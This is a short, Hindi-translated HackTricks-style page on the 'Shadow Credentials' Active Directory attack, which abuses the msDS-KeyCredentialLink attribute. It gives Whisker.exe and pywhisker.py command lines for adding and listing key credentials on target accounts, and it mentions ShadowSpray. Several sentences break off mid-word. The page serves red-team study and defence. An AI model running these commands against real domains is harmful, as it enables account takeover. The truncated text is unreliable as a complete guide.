Shadow Credentials

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

परिचय

इस तकनीक के बारे में सभी जानकारी के लिए मूल पोस्ट की जांच करें

सारांश में: यदि आप किसी उपयोगकर्ता/कंप्यूटर के msDS-KeyCredentialLink गुण को लिख सकते हैं, तो आप उस ऑब्ज

Whisker.exe add /target:computername$ /domain:constoso.local /dc:dc1.contoso.local /path:C:\path\to\file.pfx /password:P@ssword1

यह UNIX-आधारित सिस्टम पर Whisker क्षमताओं को बढ़ाता है, Impacket और PyDSInternals का उपयोग करके पूर्ण शोषण क्षमताओं के लिए, जैसे KeyCredentials की सूची, जोड़ना, और हटाना, साथ ही उन्हें JSON प्रारूप में आयात और निर्यात करना।

python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "list"

शैडोस्प्रे का उद्देश्य है **डोमेन ऑब्ज

Last updated